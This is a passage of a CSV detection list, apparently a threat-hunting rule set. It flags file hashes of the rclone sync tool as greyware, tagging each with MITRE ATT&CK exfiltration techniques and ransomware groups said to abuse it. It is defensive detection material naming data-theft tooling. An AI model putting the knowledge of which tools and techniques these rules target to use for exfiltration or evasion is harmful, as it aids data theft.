services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f185996846f3e71d20cb79336e76f73d2b2fb7250fea1e9b98f77547fdd3bd06*",".{0,1000}f185996846f3e71d20cb79336e76f73d2b2fb7250fea1e9b98f77547fdd3bd06.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f2c9afa59d436b3f4bb9b9f63eaeebc4cd42c4013a8282a9a016b5d946eacd86*",".{0,1000}f2c9afa59d436b3f4bb9b9f63eaeebc4cd42c4013a8282a9a016b5d946eacd86.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f2f60fc62c1507491273e15d901ebec40a1c45423308074adc5fdb0ef4494724*",".{0,1000}f2f60fc62c1507491273e15d901ebec40a1c45423308074adc5fdb0ef4494724.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f30186ec0fef95b090c2771c3ccd2c2ea2c825e7e84219ec3d9c35fa0a513e4d*",".{0,1000}f30186ec0fef95b090c2771c3ccd2c2ea2c825e7e84219ec3d9c35fa0a513e4d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f3224bea461878342b1b6556e181dfe2010520f543d4059258e9ea9833f3b84f*",".{0,1000}f3224bea461878342b1b6556e181dfe2010520f543d4059258e9ea9833f3b84f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f33781a369e97243d817cf060cb90accaa821a0c5b07c8bfd519977169d7607f*",".{0,1000}f33781a369e97243d817cf060cb90accaa821a0c5b07c8bfd519977169d7607f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f3863ef3fcbcc0aa0ca00c6bf1c099be9470df360751912db5c9021d3e549d10*",".{0,1000}f3863ef3fcbcc0aa0ca00c6bf1c099be9470df360751912db5c9021d3e549d10.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f3d5d5dfe286aab5d5c0a7911ddc14ef414c26869f47197a8a3a15b4e6e716ad*",".{0,1000}f3d5d5dfe286aab5d5c0a7911ddc14ef414c26869f47197a8a3a15b4e6e716ad.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f3e721ec6af65f742acb17dee34eb3685a83880269eb6552351427346b4027f9*",".{0,1000}f3e721ec6af65f742acb17dee34eb3685a83880269eb6552351427346b4027f9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f453fb377dc017d4c2a83a223cf61ede4953bf89d6296fd245908a9957972dcb*",".{0,1000}f453fb377dc017d4c2a83a223cf61ede4953bf89d6296fd245908a9957972dcb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f465bc43be0dc450fe44f103d45ca3720918aec4925440eea06e7607c1937f24*",".{0,1000}f465bc43be0dc450fe44f103d45ca3720918aec4925440eea06e7607c1937f24.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f491b3d7eb2aff7cf06a5bd139c21a12896274ddbc44ff3a4559fcb145509b2d*",".{0,1000}f491b3d7eb2aff7cf06a5bd139c21a12896274ddbc44ff3a4559fcb145509b2d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f49cb11065c2dec1020f64d0399e65f03b75ae1cea405bfaff4ae7d045d60bdb*",".{0,1000}f49cb11065c2dec1020f64d0399e65f03b75ae1cea405bfaff4ae7d045d60bdb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f4b8d0559597ff7ae16378dc947c137a855d7198fb2357f19d2fe78c1fc7eb03*",".{0,1000}f4b8d0559597ff7ae16378dc947c137a855d7198fb2357f19d2fe78c1fc7eb03.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f50558fb674a98d8604fde66d6a8103e533dc480efa6b12234ed4e5ce76adaf5*",".{0,1000}f50558fb674a98d8604fde66d6a8103e533dc480efa6b12234ed4e5ce76adaf5.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f532a0fdd90fd1747a13717096109301033812119f9c17415ac4ac531804a021*",".{0,1000}f532a0fdd90fd1747a13717096109301033812119f9c17415ac4ac531804a021.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f539a912a343577e71d35d86545f573acf3050ab197de9d73bb789ca7634aeee*",".{0,1000}f539a912a343577e71d35d86545f573acf3050ab197de9d73bb789ca7634aeee.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f5bb1c3947c4cdf7ed4e4afd4f0a8eeffbc522cde8af5ed15a979b3f58ea2446*",".{0,1000}f5bb1c3947c4cdf7ed4e4afd4f0a8eeffbc522cde8af5ed15a979b3f58ea2446.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f634ab00dba3e7f2b6928ca0a689800856cd93c325d64610bcbcb31f4f8579ac*",".{0,1000}f634ab00dba3e7f2b6928ca0a689800856cd93c325d64610bcbcb31f4f8579ac.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f651da5ff95943ad8da00b2d48b88c607c1df47f2ba80b68e7dc76a9537c2e5d*",".{0,1000}f651da5ff95943ad8da00b2d48b88c607c1df47f2ba80b68e7dc76a9537c2e5d.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f6698805a88849bb42be528ad3ac4bbae0841172c67ec49e041b421ddf5261fc*",".{0,1000}f6698805a88849bb42be528ad3ac4bbae0841172c67ec49e041b421ddf5261fc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f6d1b2d7477475ce681bdce8cb56f7870f174cb6b2a9ac5d7b3764296ea4a113*",".{0,1000}f6d1b2d7477475ce681bdce8cb56f7870f174cb6b2a9ac5d7b3764296ea4a113.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f6eec625f705a1e3715769770854ee3a7a746daf7c74f642fca3e5ac56cad624*",".{0,1000}f6eec625f705a1e3715769770854ee3a7a746daf7c74f642fca3e5ac56cad624.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f72512b574d5155acb3a654dabc9344738151586950367fb1153e8f0ba699d6f*",".{0,1000}f72512b574d5155acb3a654dabc9344738151586950367fb1153e8f0ba699d6f.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f73c23848da2b41e6fc17bb89bddfe8910a61356ab677f8abc2c77bce44960bb*",".{0,1000}f73c23848da2b41e6fc17bb89bddfe8910a61356ab677f8abc2c77bce44960bb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f77af8dc5c2df9249cf89a4feaa8ac210051c22ec74e0eb89a947c049b53c494*",".{0,1000}f77af8dc5c2df9249cf89a4feaa8ac210051c22ec74e0eb89a947c049b53c494.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f79ba243876f4949ebc917025c9c97c71297aefb3fb0ebad1aa1d0a9b1f54e58*",".{0,1000}f79ba243876f4949ebc917025c9c97c71297aefb3fb0ebad1aa1d0a9b1f54e58.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f88594bcfa2a01e4a0fe763fed3bf2908181bc16898a001a3d77614fbe727e4a*",".{0,1000}f88594bcfa2a01e4a0fe763fed3bf2908181bc16898a001a3d77614fbe727e4a.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f89767fcf6419e6fc43d055cee054aeac776cbe6b71260d63fd1329e77351dea*",".{0,1000}f89767fcf6419e6fc43d055cee054aeac776cbe6b71260d63fd1329e77351dea.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f8b07aca7e3ee0d4b39c779d9846224921f1f95afbf8e753cd90b9908a463ae4*",".{0,1000}f8b07aca7e3ee0d4b39c779d9846224921f1f95afbf8e753cd90b9908a463ae4.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f94f319c486b649d30eb85b15790e83661e6d06f66e7cbf13a73c4d365e8b5c9*",".{0,1000}f94f319c486b649d30eb85b15790e83661e6d06f66e7cbf13a73c4d365e8b5c9.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*f97e0834c7389f6b8a911b82617e0b4f0f054764f34661b3cb2be89b8719bedb*",".{0,1000}f97e0834c7389f6b8a911b82617e0b4f0f054764f34661b3cb2be89b8719bedb.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data 
Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fa18e2f164d48c4f7cb6fe138e8a4fae1cc0e02274d81f8647d0b7bf41c12dfc*",".{0,1000}fa18e2f164d48c4f7cb6fe138e8a4fae1cc0e02274d81f8647d0b7bf41c12dfc.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fa869b8bf026b209ea57d4f49769e3f49daa3e04b8e1ebcda7d9b281850d5eb8*",".{0,1000}fa869b8bf026b209ea57d4f49769e3f49daa3e04b8e1ebcda7d9b281850d5eb8.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage services - abused by a lot of ransomware groups","T1567.002 - T1560.001 - T1030 - T1048.002 - T1048.003 - T1567.002 - T1083","TA0010","N/A","BlackSuit - Royal - Black Basta - Akira - Karakurt - AvosLocker - LockBit - BianLian - Hive - Daixin - Conti - Dagon Locker - Trigona - Quantum - Revil - 8BASE - INC Ransom - Cactus - EvilCorp* - Scattered Spider* - FiveHands - Cinnamon Tempest","Data Exfiltration","https://github.com/rclone/rclone","1","0","#filehash","N/A","8","10","45841","4099","2024-08-29T17:25:08Z","2014-03-16T16:19:57Z" "*fab5259a197e5b76e1180ac973b7374e8e1e6bd4eaab3cc33ff03efbb3665b30*",".{0,1000}fab5259a197e5b76e1180ac973b7374e8e1e6bd4eaab3cc33ff03efbb3665b30.{0,1000}","greyware_tool_keyword","rclone","Rclone is a command line program for syncing files with cloud storage 
